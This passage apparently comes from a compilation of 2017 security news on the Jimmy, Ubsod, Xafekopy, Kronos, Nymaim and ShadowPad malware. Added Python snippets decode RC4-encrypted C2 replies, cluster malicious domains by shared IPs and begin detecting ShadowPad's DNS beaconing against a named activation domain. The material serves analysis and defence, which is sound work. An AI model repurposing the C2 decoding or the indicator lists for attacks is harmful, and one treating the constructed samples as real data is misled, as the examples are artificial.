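    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """RC4 stream cipher (PRGA). Symmetric: the same call encrypts and decrypts."""
    s = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def encode_message(key: bytes, plaintext: bytes) -> str:
    """Layering as described in the write-up: RC4 first, then base64 for transport."""
    return base64.b64encode(rc4_crypt(key, plaintext)).decode("ascii")


def decode_message(key: bytes, blob: str) -> bytes:
    """Analyst's inverse: strict base64 decode, then RC4 with the extracted key.
    Raises ValueError (binascii.Error is a subclass) on malformed base64."""
    raw = base64.b64decode(blob, validate=True)
    return rc4_crypt(key, raw)


def parse_c2_reply(key: bytes, blob: str):
    """Decode a captured reply and return the command text.

    Returns None when the blob is not valid base64 or does not decrypt to
    printable ASCII, which is what a wrong key, a truncated capture or a
    different message format look like in practice.
    """
    try:
        # UnicodeDecodeError is also a ValueError subclass, so one clause covers both.
        text = decode_message(key, blob).decode("ascii")
    except ValueError:
        return None
    if not text.isprintable():
        return None
    return text


if __name__ == "__main__":
    # Constructed sample: what a "success" reply would look like on the wire.
    wire = encode_message(C2_KEY, b"success")
    print("on the wire:", wire)
    cmd = parse_c2_reply(C2_KEY, wire)
    print("decoded:", cmd, "(known command)" if cmd in KNOWN_COMMANDS else "(unknown)")
```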

Request from Jimmy for web injects

Example of the Jimmy test web injects
In the pictures below several procedures in the source code of NukeBot and the restored code of Jimmy are compared. It can clearly be seen that they completely coincide.


In isolation from the previous modifications, the newly created Jimmy would not be of much interest to researchers. However, in this context, it is an excellent example of what can be done with the source code of a quality Trojan, namely, flexibly adapt to the goals and tasks set before a botnet to take advantage of a new source.


Main body: c989d501460a8e8e381b81b807ccbe90 (discussed in the article)


Jimmy Banking Trojan Reuses NukeBot Code

30.8.2017 securityweek Virus 
A recently discovered modification of the Neutrino banking Trojan reuses parts of the NukeBot source code that was made publicly available earlier this year, Kaspersky Lab researchers discovered.

Dubbed Jimmy, the newly discovered malware shows close resemblance to NeutrinoPOS, but features a restructured main body, with functions moved to modules. Because of this change, the new Trojan no longer includes the functionality for stealing bank card data from the memory of an infected device, but is limited to receiving modules from a remote server and installing them.

The malware is able to conduct an extended scan of an infected host, including both checks inherited from Neutrino and the examination of its own name. Furthermore, using the assembly command cpuid, the threat retrieves information about the processor and compares it with checksums it contains.

Overall, however, the Trojan has been seriously rewritten, Kaspersky says: “One small difference that immediately stands out is in the calculation of checksums from the names of API functions/libraries and strings. In the first case, the checksums are used to find the necessary API calls; in the second case, for a comparison of strings (commands, process names). This approach makes static analysis much more complicated.”

While NeutrinoPOS uses two algorithms to calculate checksums for the names of API calls, libraries and strings, Jimmy has only one algorithm for all these purposes. However, the communication protocol with the command and control server remained unchanged, the researchers say.

A closer analysis of the Trojan reveals that the payload is included in the modules the main body receives. The modules include web-injects and mining capabilities for the Monero currency (XMR). Monero has become very popular with malware writers lately, and is even mined by SambaCry.

DiscordiaMiner, which had its source code made publicly available by the author for reasons similar to those that prompted the NukeBot developer to do the same (mainly to avoid accusations of fraud), also focused on mining Monero.

Jimmy’s mining module includes an identifier for the wallet that receives the mined cryptocurrency and the address of the pool, and Kaspersky was able to use these to determine that the Trojan started its mining operations close to its early July proliferation date.

In addition to being able to inject code into web pages, the web-inject modules can also take screenshots, create proxy servers, and perform other nefarious operations, similar to those in NeutrinoPOS. The modules are distributed in the form of libraries and feature different functions, based on the name of the process in which they are located.

Similar to NeutrinoPOS, Jimmy also stores a number of parameters in the registry. The researchers explain that they also managed to retrieve a test sample of the web injects, and that future iterations of the malware might “acquire ‘combat’ versions.”

Kaspersky also compared the restored code of Jimmy with the source code of NukeBot and discovered that they completely coincide in some instances. Thus, it’s clear that the author reused the code to build their own version of the malware.

“In isolation from the previous modifications, the newly created Jimmy would not be of much interest to researchers. However, in this context, it is an excellent example of what can be done with the source code of a quality Trojan, namely, flexibly adapt to the goals and tasks set before a botnet to take advantage of a new source,” Kaspersky concludes.

In an emailed comment to SecurityWeek, AlienVault security advocate Javvad Malik pointed out the risks posed by the availability of malware source code: “Once such Trojans or malware go open source, it has two main impacts. Firstly, it increases in popularity and use. But with this, the chances of it being detected and prevented by security tools also increases; so, the second impact is that others will increasingly modify the malware in order to bypass security controls. Organizations should invest in security technologies that are constantly updated with threat intelligence so that they can better detect and respond to new threats as they emerge.”

New multi platform malware/adware spreading via Facebook Messenger
26.8.2017 Kaspersky
One good thing about having a lot of Facebook friends is that you simply act as a honey pot when your friends click on malicious things. A few days ago I got a message on Facebook from a person I very rarely speak to, and I knew that something fishy was going on.

After just a few minutes analyzing the message, I understood that I was only seeing the tip of the iceberg. This malware was spreading via Facebook Messenger, serving multi-platform malware/adware, using tons of domains to prevent tracking, and earning clicks. The code is advanced and obfuscated.

Here is a screenshot of the JavaScript, a potential injector. The filename is “injection.js” (ebc117c0cf03ad4b13184d1253862586).

The initial spreading mechanism seems to be Facebook Messenger, but how it actually spreads via Messenger is still unknown. It may be from stolen credentials, hijacked browsers or clickjacking. At the moment we are not sure because this research is still ongoing.

The message uses traditional social engineering to trick the user into clicking the link. The message reads “David Video” and then a bit.ly link.

The link points to a Google doc. The document has already taken a picture from the victim’s Facebook page and created a dynamic landing page which looks like a playable movie.

When the victim clicks on the fake playable movie, the malware redirects them to a set of websites which enumerate their browser, operating system and other vital information. Depending on their operating system they are directed to other websites.

This technique is not new and has a lot of names. I would describe it as a domain chain: basically just A LOT of websites on different domains redirecting the user depending on some characteristics. These might be your language, geolocation, browser information, operating system, installed plugins and cookies.

By doing this, it basically moves your browser through a set of websites and, using tracking cookies, monitors your activity, displays certain ads for you and even, in some cases, social engineers you to click on links.

We all know that clicking on unknown links is not something that’s recommended, but through this technique they can basically force you to do so.

What I noticed during my research was that when changing the User-Agent header (browser information), the malware redirects you to different landing pages. For example, when using Firefox I was redirected to a website displaying a fake Flash Update notice, and then offered a Windows executable. The executable is flagged as adware.

When using the Google Chrome browser I was redirected to a website which mimics the layout of YouTube, even including the YouTube logo. The website then displays a fake error message tricking the user to download a malicious Google Chrome extension from the Google Web Store.

The Chrome Extension is a Downloader, which means that it downloads a file to your computer. At the time of writing, the file which should have been downloaded was not available.

One interesting finding is that the Chrome Extension has log files from the developers displaying usernames. It is unclear if this is related to the campaign, but it is still an amusing piece of information.

When using the OSX Safari browser I ended up on a similar website to the one I was directed to when using Firefox, but it was customized for OSX users. It was a fake update for Flash Media Player, and when I clicked the link an OSX executable .dmg file was downloaded. This file was also adware.

It has been a while since I saw these adware campaigns using Facebook, and it’s pretty unique that it also uses Google Docs with customized landing pages. As far as I can see, no actual malware (Trojans, exploits) is being downloaded, but the people behind this are most likely making a lot of money in ads and getting access to a lot of Facebook accounts.

Please make sure that you don’t click on these links, and please update your antivirus!

WAP-billing Trojan-Clickers on the rise
26.8.2017 Kaspersky
During the preparation of the “IT threat evolution Q2 2017” report I found several common Trojans in the “Top 20 mobile malware programs” list that were stealing money from users using WAP-billing – a form of mobile payment that charges costs directly to the user’s mobile phone bill so they don’t need to register a card or set up a user-name and password. This mechanism is similar to premium rate SMS messages but Trojans do not need to send any SMS in this case – they just need to click on a button on a web-page with WAP-billing.

From the user’s perspective, a page with WAP-billing looks like a regular web page. Usually such pages contain complete information about the payment and a button. By clicking on this button, the user is redirected to a mobile network operator server, which may show additional information and request the user’s final decision about the payment by clicking on another button. If the user connects to the Internet through mobile data, the mobile network operator can identify him/her by IP address. Mobile network operators charge users only if they are successfully identified and only after they click on the button.

From a financial point of view, this mechanism is similar to the premium rate SMS service – the charge is applied directly to users’ phone bills. However, in this case Trojans do not need to send any SMS – they just need to click on a button on a web page with WAP-billing.

We hadn’t seen any Trojans like this in a while, but several of them appeared out of nowhere. Different Trojans from different cybercriminal groups targeting different countries (Russia and India) became common at the same time. Most of them had been under development since the end of 2016 / the beginning of 2017, but their prevalence increased only in the second half of Q2 2017. Therefore, I decided to take a closer look at these Trojans.

In general, these Trojans are doing similar things. First, they turn off WiFi and turn on mobile Internet. They do this because WAP-billing works only through mobile Internet. Then they open a URL which redirects to the page with WAP-billing. Usually, Trojans load such pages and click on buttons using JavaScript (JS) files. After that they need to delete incoming SMS messages containing information about subscriptions from the mobile network operator.

Furthermore, some of them have the ability to send premium rate SMS messages. In addition, some are exploiting Device Administrator rights to make it harder to delete the Trojan.


I started with Trojans that are detected as Trojan.AndroidOS.Boogr.gsh. These files are recognized as malicious by our system, based on machine learning algorithms. The most popular files detected in Q2 2017 by ML detection were Trojans abusing WAP-billing services. After analyzing them, I found that they belong to the Trojan-Clicker.AndroidOS.Ubsod malware family.

Part of Trojan-Clicker.AndroidOS.Ubsod code where Trojan opens URLs.
It is a small and simple Trojan that receives some URLs from its command and control server (CnC) and opens them. These URLs could just be ad URLs, and the Trojan pretends to be a type of advertising software by using class names like “ViewAdsActivity”. But it can also delete all incoming SMS messages that contain the text “ubscri” (part of “Subscription”) or “одпи” (part of “Подписка”, Subscription in Russian). Furthermore, it can turn off WiFi and turn on mobile data. Trojans need this because WAP-billing only works when the page is visited through mobile Internet, not through WiFi.

Part of Trojan code to delete AoC (advice of charge) messages.
After analyzing these Trojans, I found that some of them (MD5 A93D3C727B970082C682895FEA4DB77B) also contain a different functionality – to decrypt and load (execute) additional executable files. This functionality is detected as Trojan-Dropper.AndroidOS.Ubsod. These Trojans, in addition to stealing money through WAP-billing services, were also executing another Trojan, detected as Trojan-Banker.AndroidOS.Ubsod.

Part of Trojan-Banker.AndroidOS.Ubsod code with some constants
An interesting thing about Trojan-Banker.AndroidOS.Ubsod was that it was distributed not only inside other Trojans, but also as a standalone Trojan (MD5 66FE79BEE25A92462A565FD7ED8A03B4). It is a powerful Trojan with lots of capabilities. It can download and install apps, overlay other apps with its windows (mostly to steal credentials or credit card details), show ads, send SMS messages, steal incoming messages and even execute commands in the device shell. Furthermore, it has features that steal money by abusing WAP-billing services, which means that in some cases infected users had two Trojans attacking the same thing.

Some of Trojan-Banker.AndroidOS.Ubsod commands
According to KSN statistics it was the most popular of all such Trojans, with almost 8,000 infected users in July 2017 from 82 countries. 72% of attacked users were in Russia.


Another malware family that has become popular during the last few months is Trojan-Clicker.AndroidOS.Xafekopy. This Trojan uses JS files to click on buttons on web-pages containing WAP billing to silently subscribe users to services. The most interesting thing is that these JS files look similar to Ztorg’s module JS files; they even have the same names for some functions. This Trojan was created by some Chinese-speaking developers (just like Ztorg) but mainly attacks Indian (37%) and Russian (32%) users.

Part of JS files used by Trojan-Clicker.AndroidOS.Xafekopy to click on buttons
This Trojan is distributed through ads masquerading as useful apps, mostly as battery optimizers. After installation, it acts like a useful app but with one difference – it loads a malicious library. This library decrypts and loads files from the assets folder of the installation package. These files decrypt and load another file from the assets folder which contains the main malicious functionality. It decrypts (yep, decryption again) JS files. Using these JS files it can bypass captcha forms and click on web-pages with WAP billing. By doing so it steals money from a user’s mobile accounts. It can also click on some ad pages to make money from ads.

While users see a “Battery Master” interface the Trojan is trying to steal money
The files with the main functionality (once decrypted) contain WAP-billing URLs. I was able to find only two different versions of this file – one version contains Indian links, the other Russian links.

It also can send SMS messages (most likely premium rate SMS). It steals incoming SMS messages and deletes some (most likely AoC messages).

According to KSN statistics, almost 40% of attacked users were in India, but in total we saw it attacking more than 5,000 users from 48 different countries in July 2017.


The main purpose of Trojan-Clicker.AndroidOS.Autosus.a is to steal a user’s money by clickjacking pages with WAP-billing. To do so, the Trojan receives a JS file and a URL to click on. It can also hide incoming SMS messages from the user using rules received from the CnC.

Part of Trojan-Clicker.AndroidOS.Autosus.a code
After starting, the Trojan will ask the user to activate device administrator rights for this Trojan. After that, the Trojan will delete its icon from the app list so users won’t be able to easily find it. Meanwhile the Trojan will continue working in the background, receiving its CnC commands to open URLs and click on buttons.

Part of Trojan-Clicker.AndroidOS.Autosus.a code to work with data from CnC
This Trojan attacked more than 1,400 users in July 2017, most of them were from India (38%), South Africa (31%) and Egypt (15%).


When talking about clickjacking WAP-billing services, we should mention Trojan-SMS.AndroidOS.Podec.a. This Trojan – initially found in 2014 – was a regular Trojan-SMS until 2015, when the cybercriminals switched to attacking WAP-billing services. This Trojan has lots of functionality, but its main task is to steal money by subscribing users to WAP services. It was the first mobile Trojan that was able to bypass captcha. Over the next few years it became one of the most popular mobile Trojans. Its last appearance in the top 20 most popular mobile Trojans was in Q2 2016.

Podec is still being actively distributed, mainly in Russia. It was the third most common Trojan in June 2017 among Trojans abusing WAP-billing.


During the last few months, we have detected a growth of Trojans attacking WAP-billing services in different countries. Although Trojans with such functionality have been infecting users for years, we see that there are several new Trojans, and that the number of infected users has increased significantly in recent months. Furthermore, WAP-billing services were previously under attack mostly in Russia, but now we have detected such attacks in different countries, including India and South Africa.

Even some Trojans which traditionally specialized in other attacks, started stealing users’ money by clickjacking WAP-billing services.

We weren’t able to find a reason why so many cybercriminals decided to switch to, or start, attacking WAP-billing services at the same time. WAP-billing services are not a new thing – in some countries they have existed for several years.



Code Linked to MalwareTech and Kronos Published in 2009

21.8.2017 securityweek Virus
A piece of code linked to both the British researcher Marcus Hutchins, known online as MalwareTech, and the banking Trojan named Kronos was first published in 2009.

Hutchins became famous and was named a “hero” after he helped stop the WannaCry ransomware attack by registering a domain that acted as a kill switch for the malware.

The researcher was arrested in early August in the United States as he was preparing to return to the U.K., and was charged for his alleged role in creating and selling Kronos. He has pleaded not guilty to the charges brought against him and was released on bail pending trial. He cannot leave the U.S. and will be tracked via GPS, but authorities have allowed him to access the Internet, except for the domain used to stop the WannaCry outbreak.

The only information provided so far by authorities regarding the case they have against Hutchins is that he and an unnamed partner allegedly created and sold the Kronos malware in 2014 and 2015.

While it’s unclear what evidence these accusations are based on, some believe it may have something to do with a tweet posted by MalwareTech in February 2015, when he claimed a hooking engine he made had been abused by malware developers.

A researcher known online as “Hasherezade” has published a detailed analysis of Kronos, a piece of malware that has been around since 2014, on the Malwarebytes blog. The expert pointed out that the code used by Kronos authors to implement hooking, a technique for modifying the behavior of an application by intercepting function calls or messages passed between different components, is similar to one published by MalwareTech on his GitHub account.

However, as a Greece-based expert noted, the hooking technique found in both Kronos and MalwareTech’s GitHub account was first described in 2009.

MalwareTech is not allowed to discuss his case with anyone, but he pointed out on Twitter that none of the code found on his GitHub account implements new techniques and instead represents proof-of-concept (PoC) code for existing methods.

It’s unclear at this point if investigators used these similarities to link Hutchins to Kronos and if the code that the researcher claimed was stolen from him in 2015 was used in this banking Trojan or different malware.

According to Hasherezade, an analysis of the Kronos code suggests that its author is a skilled malware developer.

“The code is well obfuscated, and also uses various tricks that require understanding of some low-level workings of the operating system. The author not only used interesting tricks, but also connected them together in a logical and fitting way. The level of precision led us to the hypothesis that Kronos is the work of a mature developer, rather than an experimenting youngster,” Hasherezade said.

While many have named Hutchins a hero for his role in stopping the WannaCry outbreak, some, including Immunity founder Dave Aitel, believe he may have actually been involved in the WannaCry attack.

Legal aspects of the case

In the meantime, some media reports claim Britain’s GCHQ spy agency knew that the FBI had been investigating Hutchins before he travelled to the United States. People familiar with the matter told The Sunday Times that the expert’s arrest in the U.S. freed the British government from the “headache of an extradition battle.”

While Hutchins awaits trial, some legal experts have called into question the constitutionality of the indictment.

“Since Hutchins’ indictment, commentators have questioned whether the creation and selling of malware—without actually using the malware—violates the two statutes under which Hutchins was charged: the Computer Fraud and Abuse Act and the Wiretap Act. It is likely that these issues will be litigated as the case unfolds,” said Alex Berengaut, a lawyer with Covington & Burling.

“But there is another question raised by the indictment: whether it violates Hutchins’ constitutional rights to charge him for his alleged conduct under any statute in this country,” Berengaut added. “Several circuits—including the Seventh Circuit, where Hutchins’ case will be heard—have recognized that the federal government cannot charge anyone, anywhere in the world irrespective of their connections to the United States.”

Researchers Uncover Infrastructure Behind Chthonic, Nymaim Trojans

17.8.2017 securityweek Virus
While analyzing malware that uses PowerShell for infection, Palo Alto Networks managed to uncover the infrastructure behind recent attacks that leveraged the Chthonic and Nymaim Trojans, along with other threats.

The analysis kicked off from one malicious sample, but resulted in security researchers from Palo Alto Networks being able to identify 707 IPs and 2,611 domains supposedly being utilized for malicious activity. While some of these resources are used to host malware, others are leveraged in other types of attacks and schemes, the researchers say.

Palo Alto Networks’ Jeff White explains that PowerShell is typically launched from Microsoft Office documents via VBA macros and used to download and execute the actual malware; what prompted the recent investigation was that the analyzed code was downloading a file from the legitimate Notepad++ website.

After accessing the site to download the file directly and discovering that all looked normal, the researcher took a closer look at the VBA code and discovered multiple functions decoding information from various arrays, as well as the fact that the code was executing an already decoded PowerShell command.

By looking at variables in the PowerShell command, White eventually discovered 171 document samples, all fairly recent and all showing the same themes for lures, and also extracted the URLs used to download over two dozen payloads from half as many domains.

One of the discovered binaries, apparently compiled in August, was observed launching a legitimate executable and injecting code into it to “download further payloads through a POST request to various websites.” This behavior is shared across the original samples and White also matched observed HTTP requests to patterns already associated with the Chthonic banking Trojan.

Further analysis of the initial 171 documents revealed a set of 8 domains, and analysis of the POST and HTTP requests to them led the researcher to identify over 5,000 observed samples as the Nymaim downloader Trojan.

Most of the samples came from only four sites: ejtmjealr[.]com, gefinsioje[.]com, gesofgamd[.]com, and ponedobla[.]bit. The ejtmjealr[.]com domain, the researcher points out, is clearly associated with ejdqzkd[.]com, a site discussed in a CERT.PL analysis of Nymaim earlier this year.

Looking at the passive resolutions for the discovered domains, the researcher found a total of 707 IP addresses associated with them.

Some of the IPs shared infrastructure, and the researcher used reverse DNS to uncover more sites linked to them, including an “idXXXXX.top” pattern supposedly associated with Nymaim (similar to the “ejXXXXX.com” domains).

This eventually led to the discovery of all the domains associated with the IPs, and allowed the researcher to single out two clusters of infrastructure that also interconnect.

The investigation also revealed that the infrastructure is used to distribute other malware families, such as the Locky ransomware.

The shared infrastructure is also used to host a forum of illegal services, while some clusters of domains are “used by the Hancitor malware dropper to host the initial check-in and tracking.”

The security researchers published the lists of 707 IPs and 2,611 domains uncovered as part of this investigation on GitHub.

“These findings represent a collection of compromised websites, compromised registrar accounts used to spin up subdomains, domains used by malware DGA’s, phishing kits, carding forums, malware C2 sites, and a slew of other domains that revolve around criminal activity,” Palo Alto’s researcher concludes.
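The pivot described above, as an added Python example that is not Palo Alto Networks’ code: it clusters domains that transitively share IP addresses in a passive-DNS table and flags members matching the two naming patterns. The four Nymaim domains and ejdqzkd.com are the ones named in the article; the IP addresses, the idXXXXX.top name and the unrelated domain are constructed, and the two regular expressions are loose approximations of the patterns, not a model of the DGA.

```python
import re
from collections import defaultdict

# Constructed passive-DNS sample (domain, ip). The four Nymaim domains and
# ejdqzkd.com are named in the article; the IPs (RFC 5737 test ranges), the
# idXXXXX.top name and the unrelated domain are hypothetical.
PASSIVE_DNS = [
    ("ejtmjealr.com", "203.0.113.10"),
    ("ejdqzkd.com", "203.0.113.10"),
    ("gefinsioje.com", "203.0.113.10"),
    ("gefinsioje.com", "203.0.113.11"),   # one domain bridging two IPs
    ("gesofgamd.com", "203.0.113.11"),
    ("idkq7zx.top", "203.0.113.11"),
    ("ponedobla.bit", "198.51.100.7"),
    ("unrelated-shop.example", "192.0.2.50"),
]

# Loose approximations of the "ejXXXXX.com" and "idXXXXX.top" naming patterns
# mentioned in the write-up; heuristics only, not a model of the DGA.
NAME_PATTERNS = (
    re.compile(r"^ej[a-z]{5,}\.com$"),
    re.compile(r"^id[a-z0-9]{5,}\.top$"),
)


def cluster_infrastructure(resolutions):
    """Group domains that share IPs, transitively (domain -> IP -> domain ...),
    using a small union-find over domain and IP nodes."""
    parent = {}

    def find(node):
        parent.setdefault(node, node)
        while parent[node] != node:
            parent[node] = parent[parent[node]]   # path halving
            node = parent[node]
        return node

    def union(a, b):
        parent[find(a)] = find(b)

    for domain, ip in resolutions:
        union(("domain", domain), ("ip", ip))

    clusters = defaultdict(lambda: {"domains": set(), "ips": set()})
    for domain, ip in resolutions:
        root = find(("domain", domain))
        clusters[root]["domains"].add(domain)
        clusters[root]["ips"].add(ip)
    return list(clusters.values())


def matches_known_pattern(domain):
    return any(p.match(domain) for p in NAME_PATTERNS)


def expand_from_seed(resolutions, seed):
    """Return the cluster containing `seed` (or None), with the members that
    match a known naming pattern listed separately."""
    for cluster in cluster_infrastructure(resolutions):
        if seed in cluster["domains"]:
            return {
                "domains": sorted(cluster["domains"]),
                "ips": sorted(cluster["ips"]),
                "pattern_hits": sorted(d for d in cluster["domains"]
                                       if matches_known_pattern(d)),
            }
    return None


if __name__ == "__main__":
    print(expand_from_seed(PASSIVE_DNS, "ejtmjealr.com"))
```

Running the script prints the cluster that contains ejtmjealr.com; in the constructed table gefinsioje.com resolves to two addresses and so bridges what would otherwise be two separate clusters, which is the kind of link the reverse-DNS step in the article exposes.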

Backdoor Found in Popular Server Management Software used by Hundreds of Companies
16.8.2017 thehackernews
Cyber criminals are becoming more adept, innovative, and stealthy with each passing day. They are now adopting more clandestine techniques that come with limitless attack vectors and are harder to detect.
Recently, cyber crooks managed to infiltrate the update mechanism for a popular server management software package and altered it to include an advanced backdoor, which went undetected for at least 17 days before researchers discovered it.
Dubbed ShadowPad, the secret backdoor gave attackers complete control over networks, hidden behind legitimate, cryptographically signed software sold by NetSarang and used by hundreds of banks, media firms, energy companies, pharmaceutical firms, telecommunication providers, transportation and logistics companies and other industries, for 17 days starting last month.
Important Note: If you are using any of the affected products (listed below), we highly recommend you stop using them until you have updated.
Hacker Injected Backdoor Through Software Update Mechanism
According to researchers at Kaspersky Lab, who discovered this well-hidden backdoor, someone managed to hijack NetSarang's update mechanism and silently insert the backdoor into a software update, so that the malicious code was delivered to all of its customers signed with NetSarang's legitimate certificate.
The attackers behind the Petya/NotPetya ransomware that infected computers around the world in June used the same tactic: they compromised the update mechanism of the Ukrainian financial software provider MeDoc and swapped in a malicious update carrying NotPetya.
"ShadowPad is an example of the dangers posed by a successful supply-chain attack," Kaspersky Lab researchers said in their blog post published Tuesday. "Given the opportunities for covert data collection, attackers are likely to pursue this type of attack again and again with other widely used software components."
The secret backdoor was located in the nssock2.dll library within NetSarang's Xmanager and Xshell software suites that went live on the NetSarang website on July 18.
Kaspersky Lab researchers discovered the backdoor and privately reported it to the company on August 4, and NetSarang immediately took action, pulling the compromised software suite from its website and replacing it with a previous clean version.
The affected NetSarang's software packages are:
Xmanager Enterprise 5.0 Build 1232
Xmanager 5.0 Build 1045
Xshell 5.0 Build 1322
Xftp 5.0 Build 1218
Xlpd 5.0 Build 1220
Hackers Can Remotely Trigger Commands
The attackers hid the ShadowPad backdoor code in several layers of encrypted code that are decrypted only under specific conditions.
"The tiered architecture prevents the actual business logics of the backdoor from being activated until a special packet is received from the first tier command and control (C&C) server (activation C&C server)," the researchers wrote.
Until then, the backdoor pings out every 8 hours to a command-and-control server with basic information on the compromised computers, including their domain names, network details, and usernames.
Here's how the attackers activate the backdoor:
Activation of the backdoor is triggered by a specially crafted DNS TXT record for a specific domain name. The domain name is generated from the current month and year, and the backdoor performs a DNS lookup on it.
Once triggered, the command and control DNS server returns the decryption key for the next stage of the code, which the software downloads, effectively activating the backdoor.
Once activated, the ShadowPad backdoor provides a full backdoor for an attacker to download and run arbitrary code, create processes, and maintain a virtual file system (VFS) in the registry, which is encrypted and stored in locations unique to each victim.
Kaspersky researchers said they could confirm an activated backdoor in one case, against an unnamed company located in Hong Kong.
How to Detect this Backdoor and Protect Your Company
NetSarang rolled out an update removing the malicious code on August 4 and is investigating how the backdoor got into its software.
Anyone who has not updated their NetSarang software since then is strongly advised to upgrade to the latest version of the NetSarang package immediately.
Additionally, check if there were DNS requests from your organization to the following list of domains. If yes, the requests to those domains should be blocked.
NetSarang installation kits from April do not include the malicious library.


Backdoors Found in Tools Used by Hundreds of Organizations

16.8.2017 securityweek Virus
Many organizations around the world using connectivity tools from NetSarang are at risk after researchers at Kaspersky Lab discovered that malicious actors had planted a backdoor in several of the company’s products.

NetSarang, which has offices in the United States and South Korea, specializes in secure connectivity solutions. Some of its most popular products are Xshell, Xmanager, Xftp and Xlpd.

Kaspersky discovered a backdoor in these tools after one of its customers in the financial sector noticed suspicious DNS requests coming from a NetSarang software package. An investigation conducted by the vendor revealed that the latest versions of Xmanager Enterprise 5 (build 1232), Xmanager 5 (build 1045), Xshell 5 (build 1322), Xftp 5 (build 1218) and Xlpd 5 (build 1220) had been compromised.

Security experts believe the attackers either modified source code or patched the software on NetSarang’s build servers after gaining access to the company’s systems. The affected builds were released on July 18 and the backdoor was only discovered on August 4.

NetSarang’s products are used by hundreds of financial, software, media, energy, electronics, insurance, industrial, construction, manufacturing, retail, telecoms, pharmaceutical and transportation companies. However, Kaspersky has only seen the malicious payload being activated on the systems of a company in Hong Kong.

Kaspersky says the malware could be lying dormant on the networks of other organizations, but NetSarang said it alerted the antivirus industry so security products may have already neutralized the malicious files.

The malware, detected by Kaspersky as Backdoor.Win32.ShadowPad.a, communicates with its command and control (C&C) server via DNS queries sent once every eight hours. The requests contain information on the infected machine, including user name, domain name and host name.

If the infected system is of interest to the attackers, they activate a fully fledged backdoor that they can use to download and execute other malware.

“If the backdoor were activated, the attacker would be able to upload files, create processes, and store information in a VFS [virtual file system] contained within the victim’s registry. The VFS and any additional files created by the code are encrypted and stored in locations unique to each victim,” researchers explained.

Kaspersky said the threat group behind this attack was careful not to leave too much evidence, but researchers did find some links to PlugX and Winnti, malware believed to have been developed by Chinese-speaking actors.

The security firm has provided indicators of compromise (IoC) to help organizations detect these attacks. NetSarang has also published a security alert to inform customers of the steps that need to be taken to address the issue.

Last month, NetSarang informed customers that it had released an update for Xshell after documents published by WikiLeaks revealed that the tool had been targeted by the CIA’s BothanSpy malware.

ShadowPad backdoor was spread in corporate networks through software update mechanism
16.8.2017 securityaffairs

Kaspersky Lab discovered attackers were able to modify the NetSarang software update process to include a malware tracked as ShadowPad backdoor.
Software update mechanisms can be an efficient attack vector; the news of the day is that hackers compromised the update process for a popular server management software package developed by NetSarang.

Attackers modified the software update process last month to include a backdoor tracked as ShadowPad, which was activated on at least one victim’s machine in Hong Kong.

NetSarang Computer, Inc. provides secure connectivity solutions and specializes in the development of server management tools for large corporate networks in many industries, including financial services, energy, retail, technology, and media.

In July, researchers at Kaspersky Lab were investigating suspicious DNS requests in a partner’s network. The requests were found on systems used to process transactions in a customer’s network in the financial industry.

Further investigation into the DNS queries led them to NetSarang, which promptly sanitized its software update process by removing the malicious library nssock2.dll from its update package.

“In July 2017, during an investigation, suspicious DNS requests were identified in a partner’s network. The partner, which is a financial institution, discovered the requests originating on systems involved in the processing of financial transactions.” states the analysis published by Kaspersky.

“Further investigation showed that the source of the suspicious DNS queries was a software package produced by NetSarang.”

Attackers have surreptitiously modified the software distributed by NetSarang to include an encrypted payload that could be remotely activated.

The attackers used several layers of encrypted code to hide the ShadowPad backdoor and activate it only upon receipt of a special packet from the first tier command and control (C&C) server (the “activation C&C server”).

“Activation of the payload would be triggered via a specially crafted DNS TXT record for a specific domain. The domain name is generated based on the current month and year values, e.g. for August 2017 the domain name used would be “nylalobghyhirgh.com”.” continues the analysis.

The module sends back to the C&C DNS server basic target information (domain and user name, system date, network configuration) and in turn receives back the decryption key for the next stage of the code, activating the ShadowPad backdoor.

The data exchanged between the module and the C&C server is encrypted with a proprietary algorithm. Experts noticed that each packet also contains an encrypted “magic” DWORD value, the bytes 52 4F 4F 44, which read as a little-endian DWORD give 0x444F4F52, i.e. ‘DOOR’.
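The DNS behaviour described in this article and in the two preceding ShadowPad write-ups (the 8-hour check-in, the monthly activation domain and the ‘DOOR’ marker) can be turned into detection logic. The Python below is an added example, not Kaspersky’s or NetSarang’s code: it parses a constructed DNS query log, matches queries against the one activation domain the text names (nylalobghyhirgh.com for August 2017; the other months’ domains come from Kaspersky’s published IoC list and are not reproduced here), flags any client that resolves the same name at a fixed 8-hour cadence even when the domain is unknown, and checks the magic DWORD on decrypted packet bytes. The log lines, hosts and timestamps are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta
import struct

# Activation domains. Only the August 2017 name is given in the text above;
# the other months' domains come from Kaspersky's IoC list and go here.
KNOWN_ACTIVATION_DOMAINS = {"nylalobghyhirgh.com"}

# Constructed DNS query log (not real telemetry). Host 10.0.0.5 resolves the
# August domain at the 8-hour cadence the analysis describes; 10.0.0.7 is
# ordinary traffic. Format: "<ISO timestamp> <client> <qname> <qtype>".
SAMPLE_DNS_LOG = """\
2017-08-01T02:10:04 10.0.0.5 nylalobghyhirgh.com TXT
2017-08-01T02:11:30 10.0.0.7 www.example.com A
2017-08-01T10:10:09 10.0.0.5 nylalobghyhirgh.com TXT
2017-08-01T12:45:00 10.0.0.7 www.example.com A
2017-08-01T18:10:02 10.0.0.5 nylalobghyhirgh.com TXT
2017-08-01T19:03:11 10.0.0.7 mail.example.com A
2017-08-02T02:10:05 10.0.0.5 nylalobghyhirgh.com TXT
2017-08-02T09:00:00 10.0.0.7 www.example.com A
"""


def parse_dns_log(text):
    """Parse the simple log format into (timestamp, client, qname, qtype)."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, qname, qtype = line.split()
        records.append((datetime.fromisoformat(ts), client,
                        qname.lower().rstrip("."), qtype))
    return records


def find_known_domains(records):
    """Direct IoC match: which clients asked for a known activation domain."""
    return sorted({(client, qname) for _, client, qname, _ in records
                   if qname in KNOWN_ACTIVATION_DOMAINS})


def find_periodic_beacons(records, period=timedelta(hours=8),
                          tolerance=timedelta(minutes=15), min_queries=4):
    """Behavioural match: (client, qname) pairs queried at a fixed cadence.

    Needs no knowledge of the DGA, only the 8-hour check-in interval; a
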